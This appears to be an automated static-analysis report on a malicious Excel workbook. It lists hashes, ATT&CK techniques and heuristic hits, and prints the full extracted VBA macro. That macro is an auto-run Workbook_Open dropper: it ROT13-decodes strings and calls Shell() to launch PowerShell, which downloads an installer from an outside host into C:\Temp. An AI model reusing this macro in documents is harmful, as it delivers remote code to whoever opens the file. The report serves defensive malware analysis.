Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 1992414fd8da639e…

MALICIOUS

Office (OOXML)

16.8 KB Created: 2021-06-05 13:17:07 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-06-17
MD5: 1a01134593ab24ac4740b58a6400ab6b SHA-1: af84a041f048ff94c470da3c0f3d09ee83313cf5 SHA-256: 1992414fd8da639e6cde2aa0eb9e11d08e99ca8c0d980b0c2b5ea8bfa9e10e53
160 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The VBA macro contains a Workbook_Open subroutine that executes a command using the Shell() function. This function is used to download a payload from 'uggcf://gur.rnegu.yv/~ftgngunz/chggl/yngrfg/j64/chggl-64ovg-0.75-vafgnyyre.zfv' and save it as 'P:\Grzc\chggl.zfv'. It then executes this payload. The macro also attempts to open a hyperlink to 'uggcf://lbhghor.pbz'. The deobfuscation function `n7777c5f8fe06f5508c82b4c40a1ba1d3` appears to be a ROT13 cipher, which is commonly used to obfuscate malicious strings.

Heuristics 4

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3771 bytes
SHA-256: efd6944bfe2c5add5f773d00867075215bfaf978a48efb125756f55efe0d6926
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
Dim m78258c303355e10d5773649cef0e17c5 As String
m78258c303355e10d5773649cef0e17c5 = "argfgng"
m78258c303355e10d5773649cef0e17c5 = n7777c5f8fe06f5508c82b4c40a1ba1d3(m78258c303355e10d5773649cef0e17c5)
Dim b16b23315a50f3780c5c7071abc30a0a8 As String
b16b23315a50f3780c5c7071abc30a0a8 = "vaibxr-jroerdhrfg -Hev 'uggcf://gur.rnegu.yv/~ftgngunz/chggl/yngrfg/j64/chggl-64ovg-0.75-vafgnyyre.zfv' -BhgSvyr 'P:\Grzc\chggl.zfv' -HfrQrsnhygPerqragvnyf"
b16b23315a50f3780c5c7071abc30a0a8 = n7777c5f8fe06f5508c82b4c40a1ba1d3(b16b23315a50f3780c5c7071abc30a0a8)
Dim na97e0af8d92b5dece0273ab821e993a3 As String
na97e0af8d92b5dece0273ab821e993a3 = "P:\Jvaqbjf\Flfgrz32\JvaqbjfCbjreFuryy\i1.0\cbjrefuryy.rkr"
na97e0af8d92b5dece0273ab821e993a3 = n7777c5f8fe06f5508c82b4c40a1ba1d3(na97e0af8d92b5dece0273ab821e993a3)
Call ed2795a63bfcb3361e2135a5d3c97e498(m78258c303355e10d5773649cef0e17c5, na97e0af8d92b5dece0273ab821e993a3)
Call cceb3b6c6e541ad211de0e097431e32dc(b16b23315a50f3780c5c7071abc30a0a8, na97e0af8d92b5dece0273ab821e993a3)
Dim r2c7fc27bbae458e90bca434c265a3016 As String
r2c7fc27bbae458e90bca434c265a3016 = "uggcf://lbhghor.pbz"
r2c7fc27bbae458e90bca434c265a3016 = n7777c5f8fe06f5508c82b4c40a1ba1d3(r2c7fc27bbae458e90bca434c265a3016)
ActiveWorkbook.FollowHyperlink Address:=r2c7fc27bbae458e90bca434c265a3016
End Sub
Private Sub ed2795a63bfcb3361e2135a5d3c97e498(t0d82028f15596d5afc51c2d0fc9fad8f As String, e4d103366b2c0dcd16b291e93d75211ad As String)
Dim q0814e146cac4aa4983eac5ba4a62626b As String
Dim x739a9ebffab684dbf105d2a6ed29c0a3 As String
q0814e146cac4aa4983eac5ba4a62626b = e4d103366b2c0dcd16b291e93d75211ad
x739a9ebffab684dbf105d2a6ed29c0a3 = t0d82028f15596d5afc51c2d0fc9fad8f
Call Shell("""" & q0814e146cac4aa4983eac5ba4a62626b & """ """ & x739a9ebffab684dbf105d2a6ed29c0a3 & """", vbNormalFocus)
End Sub
Private Sub cceb3b6c6e541ad211de0e097431e32dc(t0d82028f15596d5afc51c2d0fc9fad8f As String, e4d103366b2c0dcd16b291e93d75211ad As String)
Dim q0814e146cac4aa4983eac5ba4a62626b As String
Dim x739a9ebffab684dbf105d2a6ed29c0a3 As String
q0814e146cac4aa4983eac5ba4a62626b = e4d103366b2c0dcd16b291e93d75211ad
x739a9ebffab684dbf105d2a6ed29c0a3 = t0d82028f15596d5afc51c2d0fc9fad8f
Call Shell("""" & q0814e146cac4aa4983eac5ba4a62626b & """ """ & x739a9ebffab684dbf105d2a6ed29c0a3 & """", vbHide)
End Sub
Private Function n7777c5f8fe06f5508c82b4c40a1ba1d3(sText)
Const b2359b705477c8ec8a375f34e388839bc = "abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ"
Dim v647d91d9168d4998b0a669142f3373e3, tc9e8e18c69d0fe80fa11439e97a04928
For tc9e8e18c69d0fe80fa11439e97a04928 = 1 To Len(sText)
iChar = InStr(b2359b705477c8ec8a375f34e388839bc, Mid(sText, tc9e8e18c69d0fe80fa11439e97a04928, 1))
If iChar = 0 Then
v647d91d9168d4998b0a669142f3373e3 = v647d91d9168d4998b0a669142f3373e3 & Mid(sText, tc9e8e18c69d0fe80fa11439e97a04928, 1)
Else
v647d91d9168d4998b0a669142f3373e3 = v647d91d9168d4998b0a669142f3373e3 & Mid(b2359b705477c8ec8a375f34e388839bc, iChar + 13, 1)
End If
Next
n7777c5f8fe06f5508c82b4c40a1ba1d3 = v647d91d9168d4998b0a669142f3373e3
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 22528 bytes
SHA-256: cdf4cf0edc6432eef678373c87cb3ec15f89f143d2f4614083e34a72e0a25b61

Open this report in the interactive analyzer, or submit your own file for analysis.